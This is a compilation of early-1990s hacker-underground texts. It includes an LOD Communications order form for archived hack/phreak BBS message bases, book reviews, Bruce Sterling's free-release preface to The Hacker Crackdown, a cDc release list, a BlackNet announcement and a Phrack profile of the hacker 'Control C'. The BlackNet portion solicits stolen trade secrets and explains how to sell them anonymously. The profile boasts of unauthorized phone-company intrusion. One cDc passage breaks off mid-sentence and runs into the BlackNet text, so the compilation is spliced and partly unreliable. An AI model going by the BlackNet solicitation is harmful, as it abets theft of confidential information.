retrieve that data. The earliest underground hacker bulletin board systems operated at a time when TRS-80s, Commodore 64s, and Apple ][s were state-of-the-art. Today, it is difficult to find anyone who has one of these machines in operating condition, not to mention the brain cells left to recall how to operate them. :-( LOD Communications has created a historical library of the "dark" portion of Cyberspace. The project's goal is to acquire as much information as possible from underground Hack/Phreak (H/P) bulletin boards that were in operation during a decade long period, dating from the beginnings (in 1980/81 with 8BBS and MOM: Modem Over Manhattan) to the legendary OSUNY, Plover-NET, Legion of Doom!, Metal Shop, etc. up through the Phoenix Project circa 1989/90. Currently, messages from over 75 different BBSes have been retrieved, although very few message bases are 100% complete. However, not having a complete "set" does not diminish their value. DONATIONS: A portion of every order will be donated to the following causes: 1) A donation will be made to help pay for Craig Neidorf's (Knight Lightning - Metal Shop Private Co-Sysop) Legal Defense bills (resulting from his successful campaign to protect First Amendment rights for electronic publishing, i.e. the PHRACK/E911 case). 2) The SotMESC Scholarship Fund. The SotMESC Scholarship is awarded to students writing exceptional papers of 20 to 30 pages on a topic based on computer culture (ie, hacking culture, virus writing culture, Internet culture, etc.) For more details write: SotMESC PO BOX 573 Long Beach, MS 39560 or email: rejones@seabass.st.usm.edu NOTE: THE FIRST DONATIONS TO EACH OF THE ABOVE TWO CAUSES HAVE ALREADY BEEN MADE. What Each "Message Base File" Contains: --------------------------------------- - A two page general message explaining H/P BBS terminology and format. - The BBS Pro-Phile: A historical background and description of the BBS either written by the original system operator(s) or those who actually called the BBS when it was in operation (it took months to track the appropriate people down and get them to write these specifically for this project; lesser known BBSes may not contain a Pro-Phile); - Messages posted to the BBS (i.e. the Message Base); - Downloaded Userlists if available; and - Hacking tutorials a.k.a. "G-Philes" that were on-line if available. It is anticipated that most people who are interested in the message bases have never heard of a lot of the BBS names shown in the listing. If you have seen one set of messages, you have NOT seen them ALL. Each system had a unique personality, set of users, and each has something different to offer. Formats the Message Base Files are Available in: ------------------------------------------------ Due to the large size of the Message Base Files, they will be compressed using the format of your choice. Please note that Lodcom does NOT include the compression/uncompression program (PKZIP, PAK, MAC Stuffit, etc.). ASCII (uncompressed) files will be provided for $5.00 extra to cover additional diskette (files that are uncompressed require more than double the number of diskettes) and shipping costs. The files are available for: - IBM (5.25 or 3.5 inch) - APPLE MACINTOSH (3.5 inch) - ATARI ST (MS-DOS Compatible 3.5 inch) - AMIGA (3.5 inch) - PAPER versions can be ordered but cost triple (due to increased costs to ship, time to print, and messages being in 40 column format which wastes lots of paper...save those trees!). Paper versions take twice the time to deliver but are laser printed. Orders are expected to arrive at the requesters' physical mail box in 3-5 weeks upon receipt of the order. The Collection: --------------- This is where we currently stand as far as what has been completed and the estimated completion dates for the rest of the project: Volume 1: 5700+ Messages, 20 H/P BBSes, COMPLETED. Volume 2: 2100+ Messages, 25 H/P BBSes, COMPLETED. Volume 3: 20-30 H/P BBSes, End of March 1994. Volume 4: ????? H/P BBSes, Sometime after 3/94. All in all there is expected to be 12000+ Messages. NOTE: Additional material has recently been received for Boards already released in the first 2 volumes. Those who have already ordered will receive the updated versions with the additional messages that have been recovered. *** Blurbs and Excerpts: *** ---------------------------- Blurbs from some of those who have received the first two Volumes: "I am stunned at the quality of this undertaking. It brought back that feeling of involvement and interest." --P.P. "I think of the release of the H/P Message Bases as an opening salvo in the battle for the truth about fraud in the Telecom Industry." --J.J. "Still sifting through Volume one. For now I've taken the approach of putting all the files into one subdirectory and searching it for topics of interest. Prime and Primos computers was my first topic of interest and Volume I yielded quite a bit of odd and useful information." --K.B. "...the professionalism of the Message Bases is of a superior quality. Somehow they bring back that age of innocence. Boy do I miss those times." --A.C. Excerpt from 2600 Magazine (The Hacker Quarterly) Autumn 1993 Issue, review by Emmanuel Goldstein entitled NEVER ERASE THE PAST. "...is this the sort of thing that people really care about? Undoubtedly, many will shrug it off as useless, boring teenagers that have absolutely no relevance to anything in the real world. The fact remains, however, that this is history. This is *our* history, or at least, a small part of it. The boards included in this project - Sherwood Forest I & II, Metal Shop Private, OSUNY, Phoenix Project, and a host of others - are among the more interesting hacker boards, with some classic dialogue and a gang of hacker stars-to-be. Nearly all of these boards were raided at one time or another, which makes it all even more fascinating." "Had the LODCOM project not come along when it did, a great many of these message bases probably would have been lost forever. Providing this service to both the hacker community and those interested in it is a noble cause that is well worth the price. If it succeeds, some valuable hacker data will be preserved for future generations." The Lodcom project was also reviewed in Computer underground Digest Issue #5.39 and will be reviewed by GRAY AREAS MAGAZINE in their summer issue. You should be able to find the issue on most newsstands in about 3 months. You can contact Gray Areas by phone: 215-353-8238 (A machine screens their calls), by email: grayarea@well.sf.ca.us, and by regular mail: Gray Areas, Inc. , PO BOX 808, Broomall, PA 19008-0808. Subscriptions are $18.00 a year U.S. and we highly recommend the magazine if you are interested in the gray areas of life. *** {End of Blurbs and Excerpts} *** Volume 1 & 2 Table of Contents: ------------------------------- A detailed Table of Contents file can be found on the Mindvox Gopher Server or requested via email. Project Contributor List: ------------------------- The following is a list (order is random) of those who helped with this effort that began in Jan. of 1993. Whether they donated material, uploaded messages, typed messages from printouts, critiqued our various materials, wrote BBS Pro-Philes, donated services or equipment, or merely 'looked in their attic for some old disks', their help is appreciated: Lord Digital and Dead Lord (Phantom Access Technologies/The MINDVOX System), 2600 Magazine/Emmanuel Goldstein, The Marauder, Knight Lightning, T.B., Computer underground Digest (CuD)/Jim Thomas/Gordon Meyer, Phrack Magazine, Strat, Jester Sluggo, Erik Bloodaxe, Taran King, Professor Falken, TUC, Lex Luthor, Mark Tabas, Phantom Phreaker, Quasi Moto, The Mechanic, Al Capone, Compu-Phreak, Dr. Nibblemaster, King Blotto, Randy Hoops, Sir Francis Drake, Digital Logic, The Ronz, Doctor Who, The Jinx, Boca Bandit, Crimson Death, Doc Holiday, The Butler, Ninja Master, Silver Spy, Power Spike, Karl Marx, Blue Archer, Dean Simmons, Control-C, Bad Subscript, Swamp Ratte, Randy Smith, Terminal Man, SK Erickson, Slave Driver, R.E.Jones/CSP/SotMESC, Gray Areas Magazine, and anonymous others. The Order Form: --------------- - - - - - - - - - - - - - - - C U T - H E R E - - - - - - - - - - - - - - - - LOD Communications H/P BBS Message Base ORDER FORM ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ PERSONAL RATE: Volumes 1, 2, 3, and possibly a fourth if created: $39.00 This price is TOTAL & includes any updates to individual BBS Message Bases. COMMERCIAL RATE: Corporations, Universities, Libraries, and Government Agencies: $99.00 As above, price is total and includes updates. H/P BBS Message Bases (All Volumes): $________ "G-Phile" Collection (Optional): $____________ ($10.00 Personal) ($25.00 Commercial) Disk Format/Type of Computer: _____________________________________ (Please be sure to specify diskette size [5.25" or 3.5"] and high/low density) File Archive Method (.ZIP [preferred], .ARJ, .LHZ, .Z, .TAR) ____________ (ASCII [Non-Compressed] add $5.00 to order) Texas Residents add 8% Sales Tax. If outside North America please add $6.00 for Shipping & Handling. Total Amount (In U.S. Dollars): $ ___________ Payment Method: Check or Money Order please, made out to LOD Communications. Absolutely NO Credit Cards, even if it's yours :-) By purchasing these works, the Purchaser agrees to abide by all applicable U.S. Copyright Laws to not distribute or reproduce, electronically or otherwise, in part or in whole, any part of the Work(s) without express written permission from LOD Communications. Send To: Name: _____________________________________ Organization: _____________________________________ (If applicable) Street: _____________________________________ City/State/Zip: _____________________________________ Country: _____________________________________ E-mail address: _____________________________________ (If applicable) PRIVACY NOTICE: The information provided to LOD Communications is used for sending orders and periodic updates to the H/P BBS Message Base Price List. It will NOT be given or sold to any other party. Period. - - - - - - - - - - - - - - - C U T - H E R E - - - - - - - - - - - - - - - - Remit To: LOD Communications 603 W. 13th Suite 1A-278 Austin, Texas USA 78701 Lodcom can also be contacted via E-mail: lodcom@mindvox.phantom.com Voice Mail: 512-448-5098 _____________________________________________________________________________ End Brief Version of Order/Info File (2/20/94) Email: lodcom@mindvox.phantom.com Voice Mail: 512-448-5098 Snail Mail: LOD Communications 603 W. 13th Suite 1A-278 Austin, Texas USA 78701 ------------------------------------------------------------------------------ BooX for Hackers ================ by Seven Up Usually I am not reading too many books. But there are two rather new ones everyone should read and have. UNIX Power Tools ================ The first one is made for people who like to play with UNIX. It is called 'UNIX Power Tools', published by Bantam and O'Reilly. It contains over 1000 pages and weighs about 3 pounds, but contains a CD ROM. It contains pretty useful information and examples on how to use standard UNIX utilities and how to solve certain tasks. Some of the topics it covers are: Encryption of passwords, shell programming, config files for logging in and out, setting shell prompts, vi tips & tricks, redirecting and piping, sed & awk and much more. Like most O'Reilly books, it is written with a lot of humor and easy to read. To me, this book is a reference for almost any question. You might even feel that you don't need most of your old UNIX books anymore, because this book almost covers it all. It is also a lot of fun just to browse through the book randomly and read articles on different subjects. There really is no need and no use to read it from A to Z. A lot of their tricks is collected from Usenet Newsgroups. All of their use- ful programs, scripts and general PD programs you will find on FTP sites are on the CD. However, if you want a different medium they charge you $40. And now we come to the only problem of the book: the price! I think compared to the contents, charging $59.95 is justified; but it might scare off many people anyway. Finally I would recommend this book to everyone who uses UNIX a lot and likes to experiment and play with it (and has 60 bucks left). Hacker Crackdown ================ Now reading Bruce's book won't cost you 60 bucks. In fact, it will even be totally FREE! I won't say too much about the book, because there have already been great reviews in Phrack and 2600 in Spring/Summer 1993. It is probably the most interesting and entertaining book about Hackers and Fedz from 1993. But now Bruce decided to release the book as online freeware - you may just grab the 270k file from a site, read it and give it to anyone you want. But let's listen to Bruce now and what he has to say... January 1, 1994 -- Austin, Texas Hi, I'm Bruce Sterling, the author of this electronic book. Out in the traditional world of print, *The Hacker Crackdown* is ISBN 0-553-08058-X, and is formally catalogued by the Library of Congress as "1. Computer crimes -- United States. 2. Telephone -- United States -- Corrupt practices. 3. Programming (Electronic computers) -- United States -- Corrupt practices." 'Corrupt practices,' I always get a kick out of that description. Librarians are very ingenious people. The paperback is ISBN 0-553-56370-X. If you go and buy a print version of *The Hacker Crackdown,* an action I encourage heartily, you may notice that in the front of the book, beneath the copyright notice -- "Copyright (C) 1992 by Bruce Sterling" -- it has this little block of printed legal boilerplate from the publisher. It says, and I quote: "No part of this book may be reproduced or transmitted in any form or by any means, electronic or mechanical, including photocopying, recording, or by any information storage and retrieval system, without permission in writing from the publisher. For information address: Bantam Books." This is a pretty good disclaimer, as such disclaimers go. I collect intellectual-property disclaimers, and I've seen dozens of them, and this one is at least pretty straightforward. In this narrow and particular case, however, it isn't quite accurate. Bantam Books puts that disclaimer on every book they publish, but Bantam Books does not, in fact, own the electronic rights to this book. I do, because of certain extensive contract maneuvering my agent and I went through before this book was written. I want to give those electronic publishing rights away through certain not-for-profit channels, and I've convinced Bantam that this is a good idea. Since Bantam has seen fit to peaceably agree to this scheme of mine, Bantam Books is not going to fuss about this. Provided you don't try to sell the book, they are not going to bother you for what you do with the electronic copy of this book. If you want to check this out personally, you can ask them; they're at 1540 Broadway NY NY 10036. However, if you were so foolish as to print this book and start retailing it for money in violation of my copyright and the commercial interests of Bantam Books, then Bantam, a part of the gigantic Bertelsmann multinational publishing combine, would roust some of their heavy-duty attorneys out of hibernation and crush you like a bug. This is only to be expected. I didn't write this book so that you could make money out of it. If anybody is gonna make money out of this book, it's gonna be me and my publisher. My publisher deserves to make money out of this book. Not only did the folks at Bantam Books commission me to write the book, and pay me a hefty sum to do so, but they bravely printed, in text, an electronic document the reproduction of which was once alleged to be a federal felony. Bantam Books and their numerous attorneys were very brave and forthright about this book. Furthermore, my former editor at Bantam Books, Betsy Mitchell, genuinely cared about this project, and worked hard on it, and had a lot of wise things to say about the manuscript. Betsy deserves genuine credit for this book, credit that editors too rarely get. The critics were very kind to *The Hacker Crackdown,* and commercially the book has done well. On the other hand, I didn't write this book in order to squeeze every last nickel and dime out of the mitts of impoverished sixteen-year-old cyberpunk high-school-students. Teenagers don't have any money -- (no, not even enough for the six- dollar *Hacker Crackdown* paperback, with its attractive bright-red cover and useful index). That's a major reason why teenagers sometimes succumb to the temptation to do things they shouldn't, such as swiping my books out of libraries. Kids: this one is all yours, all right? Go give the print version back. *8-) Well-meaning, public-spirited civil libertarians don't have much money, either. And it seems almost criminal to snatch cash out of the hands of America's direly underpaid electronic law enforcement community. If you're a computer cop, a hacker, or an electronic civil liberties activist, you are the target audience for this book. I wrote this book because I wanted to help you, and help other people understand you and your unique, uhm, problems. I wrote this book to aid your activities, and to contribute to the public discussion of important political issues. In giving the text away in this fashion, I am directly contributing to the book's ultimate aim: to help civilize cyberspace. Information *wants* to be free. And the information inside this book longs for freedom with a peculiar intensity. I genuinely believe that the natural habitat of this book is inside an electronic network. That may not be the easiest direct method to generate revenue for the book's author, but that doesn't matter; this is where this book belongs by its nature. I've written other books -- plenty of other books -- and I'll write more and I am writing more, but this one is special. I am making *The Hacker Crackdown* available electronically as widely as I can conveniently manage, and if you like the book, and think it is useful, then I urge you to do the same with it. You can copy this electronic book. Copy the heck out of it, be my guest, and give those copies to anybody who wants them. The nascent world of cyberspace is full of sysadmins, teachers, trainers, cybrarians, netgurus, and various species of cybernetic activist. If you're one of those people, I know about you, and I know the hassle you go through to try to help people learn about the electronic frontier. I hope that possessing this book in electronic form will lessen your troubles. Granted, this treatment of our electronic social spectrum is not the ultimate in academic rigor. And politically, it has something to offend and trouble almost everyone. But hey, I'm told it's readable, and at least the price is right. You can upload the book onto bulletin board systems, or Internet nodes, or electronic discussion groups. Go right ahead and do that, I am giving you express permission right now. Enjoy yourself. You can put the book on disks and give the disks away, as long as you don't take any money for it. But this book is not public domain. You can't copyright it in your own name. I own the copyright. Attempts to pirate this book and make money from selling it may involve you in a serious litigative snarl. Believe me, for the pittance you might wring out of such an action, it's really not worth it. This book don't "belong" to you. In an odd but very genuine way, I feel it doesn't "belong" to me, either. It's a book about the people of cyberspace, and distributing it in this way is the best way I know to actually make this information available, freely and easily, to all the people of cyberspace -- including people far outside the borders of the United States, who otherwise may never have a chance to see any edition of the book, and who may perhaps learn something useful from this strange story of distant, obscure, but portentous events in so-called "American cyberspace." This electronic book is now literary freeware. It now belongs to the emergent realm of alternative information economics. You have no right to make this electronic book part of the conventional flow of commerce. Let it be part of the flow of knowledge: there's a difference. I've divided the book into four sections, so that it is less ungainly for upload and download; if there's a section of particular relevance to you and your colleagues, feel free to reproduce that one and skip the rest. Just make more when you need them, and give them to whoever might want them. Now have fun. Bruce Sterling -- bruces@well.sf.ca.us ------------------------------------------------------------------------------ _ _ ((___)) [ x x ] cDc communications \ / Global Domination Update #14 (' ') December 30th, 1993 (U) Est. 1986 New gNu NEW gnU new GnU nEW gNu neW gnu nEw GNU releases for December, 1993: _________________________________/Text Files\_________________________________ 241: "Cell-Hell" by Video Vindicator. In-depth article on modifying the Mitsubishi 800 cellular phone by Mr. Fraud himself. Rad. 242: "The Darkroom" by Mark Vaxlov. Very dark story about a high school rape in the photography lab at school. Disturbing. 243: "Fortune Smiles" by Obscure Images. Story set in the future with organized crime and identity-swapping. 244: "Radiocarbon Dating Service" by Markian Gooley. Who would go out with Gooley? YOUR MOM! 245: "The U.S. Mercenary Army" by Phil Agee. Forwarded by The Deth Vegetable, this file contains a speech by former CIA agent Agee on the Gulf War. Interesting stuff. 246: "The Monolith" by Daniel S. Reinker. This is one of the most disgusting files we've put out since the infamous "Bunny Lust." I don't wanna describe this, just read it. 247: "Post-Election '92 Cult Coverage" by Omega. Afterthoughts on Tequila Willy's bid for the U.S. Presidency. 248: "The Lunatic Crown" by Matthew Legare. Wear the crown. Buy a Slurpee. Seek the adept. Do not pass 'Go.' 249: "Yet Another Suicide" by The Mad Hatter. Guy gets depressed over a girl and kills himself. 250: "State of Seige" by Curtis Yarvin. The soldiers hunt the dogs hunt the soldiers. Like, war, ya know. Hell! __________________________________/cDc Gnuz\__________________________________ "cDc: We're Into Barbie!" cDc mailing list: Get on the ever-dope and slamagnifiterrific cDc mailing list! Send mail to cDc@cypher.com and include some wonderlessly elite message along he lines of "ADD ME 2 DA MAILIN LIZT!!@&!" NEW Official cDc Global Domination Factory Direct Outlets: The Land of Rape and Honey 502/491-6562 Desperadoes +61-7-3683567 Underworld 203/649-6103 Airstrip-One 512/371-7971 Ministry of Death 516/878-1774 Future Shock +61-7-3660740 Murder, Inc 404/416-6638 The Prodigal Sun 312/238-3585 Red Dawn-2 Enterprises 410/263-2258 Cyber Neurotic Reality Test 613/723-4743 Terminal Sabotage 314/878-7909 The Wall 707/874-1316,2970 We're always taking t-file submissions, so if you've got a file and want to really get it out there, there's no better way than with cDc. Upload text to The Polka AE, to sratte@phantom.com, or send disks or hardcopy to the cDc post office box in Lubbock, TX. cDc has been named SASSY magazine's "Sassiest Underground Computer Group." Hell yeah! Thanks to Drunkfux for setting up another fun HoHoCon this year, in Austin. It was cool as usual to hang out with everyone who showed up. Music credits for stuff listened to while editing this batch of files: Zapp, Carpenters, Deicide, and Swingset Disaster. Only text editor worth a damn: ProTERM, on the Apple II. So here's the new cDc release. It's been a while since the last one. It's out because I fucking felt like it, and have to prove to myself that I can do this crap without losing my mind and having to go stand in a cotton field and look at some dirt at 3 in the morning. cDc=cDc+1, yeah yeah. Do you know what this is about? Any idea? This is SICK and shouldn't be harped on or celebrated. This whole cyberdweeb/telecom/'puter underground scene makes me wanna puke, it's all sick and dysfunctional. Eat my shit, G33/" and we can be contacted (preferably through a chain of anonymous remailers) by encrypting a message to our public key (contained below) and depositing this message in one of the several locations in cyberspace we monitor. Currently, we monitor the following locations: alt.extropians, alt.fan.david-sternlight, and the "Cypherpunks" mailing list. BlackNet is nominally nondideological, but considers nation-states, export laws, patent laws, national security considerations and the like to be relics of the pre-cyberspace era. Export and patent laws are often used to explicity project national power and imperialist, colonialist state fascism. BlackNet believes it is solely the responsibility of a secret holder to keep that secret--not the responsibility of the State, or of us, or of anyone else who may come into possession of that secret. If a secret's worth having, it's worth protecting. BlackNet is currently building its information inventory. We are interested in information in the following areas, though any other juicy stuff is always welcome. "If you think it's valuable, offer it to us first." - - trade secrets, processes, production methods (esp. in semiconductors) - nanotechnology and related techniques (esp. the Merkle sleeve bearing) - chemical manufacturing and rational drug design (esp. fullerines and protein folding) - new product plans, from children's toys to cruise missiles (anything on "3DO"?) - business intelligence, mergers, buyouts, rumors BlackNet can make anonymous deposits to the bank account of your choice, where local banking laws permit, can mail cash directly (you assume the risk of theft or seizure), or can credit you in "CryptoCredits," the internal currency of BlackNet (which you then might use to buy _other_ information and have it encrypted to your special public key and posted in public place). If you are interested, do NOT attempt to contact us directly (you'll be wasting your time), and do NOT post anything that contains your name, your e-mail address, etc. Rather, compose your message, encrypt it with the public key of BlackNet (included below), and use an anonymous remailer chain of one or more links to post this encrypted, anonymized message in one of the locations listed (more will be added later). Be sure to describe what you are selling, what value you think it has, your payment terms, and, of course, a special public key (NOT the one you use in your ordinary business, of course!) that we can use to get back in touch with you. Then watch the same public spaces for a reply. (With these remailers, local PGP encryption within the remailers, the use of special public keys, and the public postings of the encrypted messages, a secure, two-way, untraceable, and fully anonymous channel has been opened between the customer and BlackNet. This is the key to BlackNet.) A more complete tutorial on using BlackNet will soon appear, in plaintext form, in certain locations in cyberspace. Join us in this revolutionary--and profitable--venture. BlackNet -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.3 mQCPAixusCEAAAEEAJ4/hpAPevOuFDXWJ0joh/y6zAwklEPige7N9WQMYSaWrmbi XJ0/MQXCABNXOj9sR3GOlSF8JLOPInKWbo4iHunNnUczU7pQUKnmuVpkY014M5Cl DPnzkKPk2mlSDOqRanJZCkyBe2jjHXQMhasUngReGxNDMjW1IBzuUFqioZRpABEB AAG0IEJsYWNrTmV0PG5vd2hlcmVAY3liZXJzcGFjZS5uaWw+ =Vmmy -----END PGP PUBLIC KEY BLOCK----- From phrack@well.sf.ca.us Thu Mar 31 18:50:04 1994 Received: from well.sf.ca.us by fido.wps.com (5.67/wps.com-hackery) id AA18097; Thu, 31 Mar 94 18:49:49 -0800 Received: (from phrack@localhost) by well.sf.ca.us (8.6.8/8.6.6) id WAA17252; Wed, 30 Mar 1994 22:57:21 -0800 Date: Wed, 30 Mar 1994 22:57:21 -0800 From: Chris Goggans Message-Id: <199403310657.WAA17252@well.sf.ca.us> To: phrack-list@well.sf.ca.us Subject: P45-07 Status: O ==Phrack Magazine== Volume Five, Issue Forty-Five, File 7 of 28 **************************************************************************** -:[ Phrack Pro-Phile ]:- This issue our prophile introduces you to one of the all-around coolest people ever to show up in the computer underground. Someone I'm happy to have had the good fortune to meet and force to ingest excessive quantities of intoxicating liquids and other unmentionables. Someone who very recently showed up on tabloid television amazingly for something other than computer hacking. Someone we know as: Control C ~~~~~~~~~ _______________________________________________________________________________ Personal Info: Handle : Control C Call Me : A Cab DOB : 1969 AGE : I Would Hope You Can Figure It Out.. Height : 6'0" Weight : 160 Groups Affiliated With : Legion of Doom/Hackers! Other Past Handles : Phase Jitter, Master of Impact, Dual Capstan, Richo Sloppy, Cosmos Dumpster Driver, Poster Boy, Whacky Wally (Sysop Whacky Wally's Wonderful World of Warez, as some of you may remember.. It Was a Hack/Phreak Board) Computers Owned: 1st Computer-Texas Instruments T-1000 ------------------------------------- Once I expanded the memory (4K plug in Module, for a total of 8k), I was unstoppable in BASIC. Commodore Vic-20 ---------------- What can you say about a Vic-20? Commodore 64 ------------ Now I was big time. 1541 Disk drive was an unbelievable upgrade from my Vic-20 and T-1000 mass storage devices (Cassette Recorder). Apple //C --------- I was now a \/\/Arez d00d. What else could you be if you had an Apple? Everyone was! IBM XT ------ This was a real step up from CP/M (hahaha). I had incredible CGA Graphics. Actually it was not a bad system. My dad got a modem with it. Bad mistake eh? I was flying at 300 baud. This is the system all my BBSes were run on. AT&T 3B1 -------- Lame, Lame, Lame... That about covers it. Commodore AMIGA 500 -------------------- A real computer at last. Real graphics. Real Sound. Real Multi-Tasking. A Real Operating System. And again...I was a \/\/ArEz D00D. But this time I was running 14.4K Baud. If you want a real computer BUY AMIGA!!! IBM 486DX2/66 ------------- Desk Top Video is really cool. But when you put you computers in the car people steal them and AAA Insurance gives you a hard time. Still fighting with them. Commodore AMIGA 3000 -------------------- I'm a \/\/arez Dood. And the KING of Desk Top Video. BUT don't put all your computers in the same car. Oops... Commodore AMIGA 500 ------------------- Now I'm back to a 500 Until I get my Insurance company to pay me. ---------------------------------------------------------------------- General Questions: Q: How did you get your Handle? A: If you cant figure this out...you should not be reading this. Q: How did you get started? A: Dad bought me an IBM XT with a 300 Baud Modem. I saw War Games...and off I went. Q: What are some of your other interests? A: Women... Women... Women... Everybody knows about my high level of hormonal activity. Also, Cars. If you don't have a Mitusubishi 3000GT: U R Lame. If you have a Stealth, I bet you wish you bought a 3000GT--after you have dealt with the FUCKING ASSHOLES at the Chrysler DealerShit. Everybody says buy American. Well, you buy a FUCKING brand new American car and it brakes down 32 times. The Chrysler dealer treats you like shit. The manufacturer treats you like shit. And your car runs like shit. The problem is that the American auto workers have absolutely no pride in their workmanship; and the manufacturers and dealers don't give a shit about you or your car after they have made the sale. Then they wonder why their sales are down and people are buying foreign cars. Well, if I go into the Mitusubishi Dealership they treat me like a king and I bought the car 6 months ago. If your gonna by a car, don't buy a Chrysler. They Suck! I bought a brand new Jeep. It broke down 32 Times. Chrysler treated me like shit. Maybe you could tell. Q: What were some of your most memorable experiences? A: The First SummerCon. Disk Jockey and LOKI came to my house the day before. This is the first time we had met. On the way to my house they got lost and came across a street called 'Summerton.' So at about 0200 in the morning we were on the corner of Summerton Street and all the sudden the Summerton sign fell of the post and landed in the car owned by Disk Jockey. Well we changed the T to a C and all the suddenly we had a SummerCon street sign. The trip down was a story in it self, as many of you have heard. It was really neat to meet all the people from the boards. I met Bill From RNOC who was my mentor and idol, but doesn't call me anymore.. (Thanks Bill). Lex Luthor who is one of the funniest guys, we will get into this later. Taran King, Knight Lightning (Scoop!), Lucifer 666...it was ELITE! SummerCon 87' - This is when I got it LOD/H. I remember sitting at the pool with Mentor being really drunk and both of us going "WOW!!! We're in LOD!" My Bust - In 1987 I was going to school in Chicago. I was on an Michigan Bell UNIX sharpening up my C programming skills, which, buy the way still need sharpening. I was on the system for 4+ hours. Well the system administrator had noticed me and called MBT security. They traced the call back to Chicago. The strange part of this was that the next morning I was quitting school and moving back to Detroit. When I got home to Detroit their was a message from MBT Security to call them or they would "Call On Me!". Well I thought it would be in my best interest to give them a ring. We met for lunch. At lunch they told me since I had been in their systems for years and not destroyed or changed anything...in fact they had never noticed me there...They would not press charges if I helped them secure there systems. I said "Ok!". The next thing I know I have an office. k-Rad elite computer. Craft Access terminals. Manuals for every phone company computer on the planet and they are paying me $30,000 a year to do what I love. I was a professional Computer Hacker. I broke into Michigan Bell computers, networks, switches, went trashing etc...while being paid. It was great. I would see what I could do once I was into their systems, then write a report on what needed to be changed or fixed. I was great for them, and me. Then I get fired - my boss at Michigan Bell loves me! Her boss loves me! The Vice President of Michigan Bell loves me! Then Michigan Bell has a retirement incentive. The Vice President and my bosses boss retire. The New manager of computer security is closed-minded, and fires me because I am "A criminal". Well, those guys at corporate security at Michigan Bell are totally out of touch. Their knowledge of computer security is...how shall I say it..."lacking," I think, covers it. In fact, the code for the front door at the Michigan Bell Corporate Security Building is the equivalent to leaving the code on your luggage 000 and wondering how the airport baggage guy figure out your code and stole all your stuff. They should have kept me on like the old guys wanted to do. It is my understanding, and I don't know because I don't do ANYTHING ILLEGAL (like the disclaimer?), but I hear that a lot of hackers are in Michigan Bell Systems. Michigan Bell Security is probably convinced that their systems are airtight. If you guys at Michigan Bell are reading this, You need help.. Look through some of my old reports and implement some of that stuff. ---------------------------------------------------------------------- Some BBS's To Mention: Planet 10/Librarians of Doom - (810)683-9722. I'm Co-Sysop. It is the only BBS I call. All the Old LOD Guys are on it. It's pretty 3l33t. If you can't hack the New User Password--U R really lame! We got 0 day AMIGA Warez. Running on a USR HST. Leave a good New User Feedback message because the users on the system read the New User Feedback and vote whether or not you will be allowed access to the system based on that message. ShadowSpawn BBS - Well, this was before I was in LOD. Our claim to fame was that we wouldn't let anyone on the BBS unless they gave us a valid phone number. We voice verified EVERYONE. And talked to them before we gave them an account. Most of the people from LOD were not on because they would not give a valid phone number. It was not my idea it was Psychic Warlord's idea. I could not believe we turned Lex Luthor down--we got in quite a fight about that. Phantasy Realm - My first BBS. I always thought It was LAME, but people always tell me how cool it was. I guess when you login 15 times a day, it seems like the posting is slow. The Coalition - I was co-sysop on this board as well. Run by Bad Subscript, one of my best friends. Another board I never thought was cool but everyone says it was great. Guess maybe I called it too much as well. Metal Shop Private - I thought I was the Elite of the Elite when I got on there. There were guys from LOD posting and everything. I really was a cool system. Catch 22 - Well I think I was the last user before the system went down. I think I was on for about 3 days before it went off line. I think it was good. As least I used it for a reference on other BBS (That was when I was just becoming well known.) Whacky Wally's Wonderful World Of Warez - Some of you may remember it. It was an H/P board that I ran for a while before Phantasy Realm. It was mostly done for a joke, but it ended up being pretty cool. ---------------------------------------------------------------------- People to mention: Erreth Akbe - One of my best friends. Helped me write this profile. Sysop of Planet 10/Librarians of Doom. The MASTER NOVELL guy. If you want to know anything about NOVELL...Talk to him. (He's a CNE!!) Without him you would have all sorts of spelling errors and this profile would really look like shit. Plus, the BBS would have crashed long ago. He's my official editor. Carol - Erreth Akbe's Wife. Love ya babe! Got me a great deal on my 3000GT. I still owe you dinner! Bad Subscript - My best friend. What a great guy. We hit Industry (the coolest nightclub in Pontiac) every Tuesday night. He's the biggest LEEEECH in the world, though. At this point he has 192 Downloads @ 94 Megs and 9 Uploads @ 2 Megs. Great ratio, eh? Lucifer 666 - What a great guy. Still talk to him daily after all these years. Comes to Detroit a lot and I go to Illinois to see him a lot. I have a great story about L666. His family owns a real estate company in Illinois where he lives. Well, they sold a house to Virgil Ramsey, a Vietnam Vet. Well, Mr. Ramsey's new house has termite damage. L666 went to the house and verified the damage. He told Mr. Ramsey that he would call an exterminator the next day. Well I guess Mr. Ramsey didn't like the exterminator idea, because the next day he went to L666's office with a bolt-action rifle. Took L666 outside into the street, with the gun to his head, and told him he was going to kill him. L666 swung around and hit the gun barrel upwards just as Ramsey pulled the trigger. They fought over the gun and L666 tossed the gun into the street. Ramsey went after the gun and L666 ran into the real estate building and locked the back door. Ramsey ran in the front door with gun in hand. L666 went into his office and locked the door. Ramsey kicked in his office door. L666 was under his desk. Ramsey said "Stand Up (L666's First Name) and take it like a Man!" L666 jumped up and they fought over the gun again. (I was at his office and saw the footprints on his door). The bolt action opened and the bullet in the chamber fell to the ground. Ramsey put the gun to L666's head and pulled the trigger, but the action was open. The cops finally came in and arrested Ramsey. They say it is some type of stress related to Vietnam. Laurie (L666's Girlfriend) - She's Cool. Hi Hoochie! Well I have a good story about her. BTW If you talk to L666 ask him why I call his girlfriend "Baldie". Anyway. L666 and Laurie came to Detroit in October. The first night we went to this bar that I always go to, called Industry. Well Laurie was worried about the crime in Detroit. I had just got done telling her that nothing ever happens Besides, we were in Pontiac! L666, Bad Subscript, Erreth Akbe DarkStar, Laurie and I were all in the car. We pulled into the Industry parking lot. Some guy was laying on the ground and 3 guys were kicking him. Then they picked him up. Through him into the back of a panel van and drove off. L666, DarkStar and Laurie had been in Detroit for all of an hour and this is the first thing we see when we go to the bar. Needless to say, she was freaking out. The rest of the weekend went smoothly, though--except for DarkStar and L666 flashing deuce gang signs at Club X in Detroit. Not a smart move. DarkStar - Hay bud. He's really fun. We party together a lot in Detroit and Illinois, but I wouldn't take him to Las Vegas with me. He did really shitty on the river boat we gambled on in the Mississippi river last November. Prime Suspect - Fellow LOD member. One of the smartest hackers I have ever met. In fact PR1ME Computers call him to help program there kernels when they can't figure it out. No lie! He also is Mr. Packet Radio. I really had fun with the cellular phone interception. I talk to him 3-4 times a week. He and Bad Subscript talk more, though. Finally after 6 or 7 years he came to Detroit to see us last November. We had a great time. I'm sure he'll be back. Bill From RNOC - Fellow LOD Member. 